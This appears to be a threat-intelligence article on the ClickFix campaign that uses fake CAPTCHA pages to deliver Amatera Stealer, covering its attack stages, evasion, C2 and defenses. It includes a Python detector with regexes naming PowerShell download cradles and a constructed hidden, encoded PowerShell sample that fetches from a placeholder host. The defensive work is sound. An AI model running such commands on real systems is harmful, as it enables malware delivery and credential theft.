Security researchers have identified an expanding ClickFix attack campaign that combines fake CAPTCHA pages with signed Microsoft Application Virtualization scripts to distribute the Amatera information stealer. The technique has become so prevalent that it now accounts for 47% of attacks observed by Microsoft.
Campaign overview
| Attribute | Details |
|---|---|
| Campaign name | EVALUSION |
| Tracked by | eSentire |
| Primary payload | Amatera Stealer |
| Secondary payload | NetSupport RAT |
| Delivery method | ClickFix social engineering |
| Prevalence | 47% of observed attacks (Microsoft) |
| First seen | Late 2024 |
| Current status | Active and expanding |
What is ClickFix?
ClickFix is a social engineering technique that manipulates users into executing malicious commands through a deceptive sequence:
Compromised website → Fake CAPTCHA → Clipboard hijack → User runs command → Malware execution
The attack exploits user conditioning around verification prompts—people are accustomed to solving CAPTCHAs and tend to follow instructions without questioning them.
Why ClickFix works
| Factor | Exploitation |
|---|---|
| CAPTCHA fatigue | Users are conditioned to comply |
| Trust indicators | Professional-looking pages |
| Urgency creation | "Verify now" messaging |
| Authority appearance | Impersonates legitimate sites |
| Minimal suspicion | No download prompts |
Attack chain breakdown
Stage 1: Initial access
Users visit a compromised or malicious website displaying what appears to be a legitimate verification prompt:
| Lure type | Examples |
|---|---|
| Fake CAPTCHA | "Verify you are human" |
| Site impersonation | Booking.com, corporate portals |
| Error message | "Fix display issue" |
| Verification gate | "Prove you're not a bot" |
The pages are professionally designed to match legitimate verification services.
Stage 2: Clipboard hijacking
Behind the fake CAPTCHA, JavaScript silently copies malicious PowerShell code to the victim’s clipboard.
| Technical detail | Implementation |
|---|---|
| Trigger | User interaction with page |
| Method | JavaScript clipboard API |
| Payload | Encoded PowerShell command |
| Visibility | Hidden from user |
Stage 3: Social engineering
The page instructs users to:
| Step | User action |
|---|---|
| 1 | Press Win + R to open the Run dialog |
| 2 | Press Ctrl + V to paste |
| 3 | Press Enter to execute |
The instructions may be framed as:
- Completing verification
- Fixing a display issue
- Confirming identity
- Bypassing an error
Stage 4: Payload delivery
The pasted command triggers a multi-stage delivery chain:
| Stage | Action |
|---|---|
| Initial PowerShell | Downloads payload from C2 |
| Image download | Fetches PNG from CDN |
| Steganography | Extracts data hidden in images via LSB steganography |
| Decryption | Decrypts and decompresses payload (GZip) |
| Memory execution | Runs entirely in memory to evade detection |
| Shellcode | Native shellcode maps and executes Amatera |
Stage 5: Signed script abuse
The campaign leverages Microsoft Application Virtualization (App-V) scripts that are digitally signed by Microsoft, which gives the attacker several advantages:
| Benefit | Explanation |
|---|---|
| Bypasses application whitelisting | Signed by trusted publisher |
| Evades security tools | Trusted certificate |
| Adds false legitimacy | Microsoft signature |
| Reduces detection | Known-good binaries |
Amatera Stealer capabilities
Amatera is an evolution of ACR (AcridRain) Stealer, available as malware-as-a-service (MaaS).
Development history
| Date | Event |
|---|---|
| Mid-2024 | ACR Stealer sales suspended |
| June 2025 | Amatera first observed |
| 2025-2026 | Active MaaS operations |
Pricing
| Plan | Cost |
|---|---|
| Monthly | $199 |
| Annual | $1,499 |
Data theft targets
| Category | Targets |
|---|---|
| Browsers | Passwords, cookies, history, autofill, payment cards |
| Cryptocurrency | Wallet files, seed phrases, private keys |
| Messaging | Discord tokens, Telegram sessions |
| Email | Client credentials, cached emails |
| FTP | FileZilla, WinSCP credentials |
| Gaming | Steam, Epic Games, other platform credentials |
| System | Hardware IDs, installed software, screenshots |
| 2FA | Authenticator app data |
Targeted applications
| Category | Applications |
|---|---|
| Browsers | Chrome, Firefox, Edge, Brave, Opera |
| Wallets | MetaMask, Exodus, Electrum, Atomic, Coinbase |
| Messaging | Discord, Telegram, Signal |
| Email | Outlook, Thunderbird |
| VPN | NordVPN, ProtonVPN configs |
| Password managers | Browser-stored credentials |
Evasion techniques
Amatera employs advanced detection evasion:
| Technique | Purpose |
|---|---|
| WoW64 SysCalls | Bypasses user-mode hooking used by EDR |
| In-memory execution | No files written to disk |
| AMSI patching | Disables Windows anti-malware scanning |
| Sandbox detection | Identifies analysis environments |
| Time-based checks | Stalls in sandbox environments |
| Anti-debugging | Detects debugger presence |
Command and control infrastructure
The EVALUSION campaign uses highly resilient C2 leveraging legitimate services:
| Service | Purpose |
|---|---|
| Google Calendar | Configuration delivery |
| jsDelivr CDN | Payload hosting |
| Binance BNB Smart Chain | Decentralized configuration storage |
| Image hosting | Steganographic payload delivery |
| Telegram | Exfiltration channel |
Blockchain C2 resilience
Using blockchain for configuration makes takedown nearly impossible:
| Factor | Implication |
|---|---|
| Immutable storage | Data cannot be removed |
| Decentralized | No single point of failure |
| Legitimate service | Cannot be blocked wholesale |
| Censorship resistant | Survives takedown attempts |
Exfiltration endpoints rotate frequently, complicating detection and response.
Detection indicators
Behavioral indicators
| Indicator | Detection value |
|---|---|
| PowerShell execution from Run dialog | High |
| Clipboard monitoring activity | Medium |
| Connections to Telegram/Discord APIs from unexpected apps | High |
| Access to browser credential stores | High |
| Image downloads followed by unusual memory activity | Medium |
| App-V script execution in unusual context | High |
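Detection logic for the first indicator in the table above, added here as an example that is not from the article or from eSentire/Microsoft: it scores constructed process-creation events (field names assumed, modelled on Sysmon Event ID 1) for PowerShell launched under explorer.exe, the parent of anything started from the Run dialog, and decodes any -EncodedCommand argument so the hidden command line is inspected as well.

```python
import base64
import re

# Field names are assumed (shaped after Sysmon Event ID 1); adapt to your telemetry.
RUN_DIALOG_PARENTS = {"explorer.exe"}  # Win+R launches children under explorer.exe
ENCODED = re.compile(r"(?i)\s-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{20,})")  # -e/-ec/-enc/-EncodedCommand
CRADLE = re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?")
QUIET = re.compile(r"(?i)-(?:nop|noprofile|ep\s+bypass|executionpolicy\s+bypass|noni)")
EXEC = re.compile(r"(?i)\b(iex|invoke-expression|frombase64string)\b")

def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or '' if absent/invalid."""
    m = ENCODED.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "replace") if m else ""
    except ValueError:  # binascii.Error is a ValueError: not really base64
        return ""

def analyze_event(event):
    """Score one event on the behavioral indicators listed in the article."""
    cmd = event.get("command_line", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + " " + decoded  # inspect the decoded payload as well as the visible arguments
    parent = event.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    checks = [
        ("powershell_from_run_dialog_parent", 2,
         parent in RUN_DIALOG_PARENTS and "powershell" in event.get("image", "").lower()),
        ("encoded_command", 2, bool(decoded)),
        ("download_cradle", 2, bool(CRADLE.search(text))),
        ("hidden_window", 1, bool(HIDDEN.search(text))),
        ("profile_or_policy_bypass", 1, bool(QUIET.search(text))),
        ("in_memory_execution", 1, bool(EXEC.search(text))),
    ]
    reasons = [name for name, _, hit in checks if hit]
    score = sum(weight for _, weight, hit in checks if hit)
    return {"suspicious": score >= 4, "score": score, "reasons": reasons, "decoded": decoded}

def triage(events):
    """Return (event, finding) pairs for every event that crosses the threshold."""
    return [(e, f) for e, f in ((e, analyze_event(e)) for e in events) if f["suspicious"]]

# Constructed sample events (not real telemetry); the encoded argument is a harmless placeholder.
_ENC = base64.b64encode("iwr http://cdn.example.invalid/lure.png -OutFile lure.png".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell -w hidden -nop -ep bypass -enc " + _ENC},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": "powershell -NoProfile -Command Get-Date"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS, "command_line": "powershell"},
]
```

A user opening an interactive PowerShell from Win + R (third sample) scores below the threshold; only the combination of Run-dialog parent, encoding, hidden window and a download cradle is flagged.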
User-visible signs
| Sign | Risk indication |
|---|---|
| Unexpected CAPTCHA prompts | Potential ClickFix |
| Requests to open Run dialog (Win + R) | Attack in progress |
| Instructions to paste clipboard contents | Malicious payload |
| "Verification" that doesn't match site behavior | Compromise |
| Pop-up errors requiring "fixes" | Social engineering |
Network indicators
| Indicator | Meaning |
|---|---|
| HTTP requests with mismatched Host header/SNI and destination IP | C2 communication |
| Connections to Google Calendar API from unexpected processes | Configuration retrieval |
| jsDelivr requests for suspicious content | Payload delivery |
| Telegram API exfiltration traffic | Data theft |
| BNB Smart Chain API calls | Configuration lookup |
File system indicators
| Artifact | Location |
|---|---|
| Downloaded PNG files | Temp directories |
| PowerShell transcript logs | If logging enabled |
| Browser data access timestamps | Profile directories |
Defensive recommendations
For organizations
| Control | Implementation |
|---|---|
| Restrict Run dialog | Group Policy to disable Win + R for standard users |
| PowerShell constraints | Constrained Language Mode, execution policy |
| Remove App-V | Uninstall if not business-required |
| EDR with behavioral detection | Detect clipboard abuse and memory-only execution |
| PowerShell logging | Enable ScriptBlock and Module logging |
| Network monitoring | Alert on C2 infrastructure patterns |
| Application whitelisting | Block unsigned scripts |
Group Policy recommendations
| Setting | Configuration |
|---|---|
| Disable Run command | User Configuration → Administrative Templates → Start Menu |
| PowerShell execution policy | AllSigned or Restricted |
| Script Block Logging | Enable in PowerShell policies |
| Module Logging | Enable in PowerShell policies |
For users
| Action | Rationale |
|---|---|
| Never paste commands you don’t understand | Core defense |
| Be suspicious of unusual verification requests | Recognition |
| Verify website legitimacy | URL inspection |
| Use dedicated password manager | Not browser storage |
| Enable MFA on all accounts | Reduce stolen credential impact |
| Report suspicious websites | Organizational awareness |
For security awareness training
Include ClickFix in phishing simulations:
| Scenario | Training value |
|---|---|
| Fake CAPTCHA | Recognition training |
| Run dialog abuse attempts | Procedure awareness |
| "Paste and run" requests | Risk understanding |
| Impersonated verification | Brand awareness |
ClickFix has been adopted by multiple threat actors:
| Actor | Campaign | Target |
|---|---|---|
| Various criminals | EVALUSION | General population |
| APT groups | Targeted campaigns | Specific organizations |
| MaaS operators | Multiple | Broad targeting |
Context
ClickFix represents a shift in attack methodology—rather than exploiting software vulnerabilities, it exploits human conditioning around verification prompts. Users are trained to expect and comply with CAPTCHAs, making the social engineering highly effective.
| Evolution | Implication |
|---|---|
| From malware exploits | To social engineering |
| From file downloads | To clipboard abuse |
| From untrusted code | To signed Microsoft binaries |
| From detectable payloads | To memory-only execution |
The technique’s prevalence (47% of observed attacks) indicates it works. Combined with sophisticated evasion techniques and resilient infrastructure, campaigns like EVALUSION pose significant risk to organizations and individuals.
Defense requires both technical controls (restricting Run dialog, PowerShell constraints) and user education (recognizing unusual verification requests). Neither alone is sufficient against well-crafted social engineering.
The use of blockchain for C2 configuration represents an emerging challenge—attackers are building infrastructure that cannot be taken down through traditional means, requiring defenders to focus on detection and user awareness rather than infrastructure disruption.